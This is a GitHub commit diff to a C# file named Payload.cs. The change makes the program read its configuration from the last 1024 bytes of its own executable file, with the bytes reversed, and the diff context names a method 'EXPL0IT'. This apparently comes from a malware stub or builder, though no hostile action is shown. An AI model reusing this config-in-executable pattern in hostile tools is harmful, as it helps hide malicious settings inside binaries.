Skip to content

Commit e569efa

Browse files
authored
Update Payload.cs
1 parent b9e23b3 commit e569efa

File tree

1 file changed

+2
-3
lines changed

1 file changed

+2
-3
lines changed

Payload.cs

+2-3
Original file line numberDiff line numberDiff line change
@@ -97,8 +97,7 @@ private static string[] ReadConfigs()
9797
{
9898
try
9999
{
100-
byte[] Stub = File.ReadAllBytes(@"C:\Users\amirreza\Desktop\123.exe");
101-
//byte[] Stub = File.ReadAllBytes(Application.ExecutablePath.ToString());
100+
byte[] Stub = File.ReadAllBytes(Application.ExecutablePath.ToString());
102101
byte[] ConfigArry = new byte[1024];
103102
Array.ConstrainedCopy(Stub, Stub.Length - 1024, ConfigArry, 0, 1024);
104103
ConfigArry = Reverse(ConfigArry);
@@ -497,4 +496,4 @@ private static void EXPL0IT()
497496

498497
#endregion
499498
}
500-
}
499+
}

0 commit comments

Comments
 (0)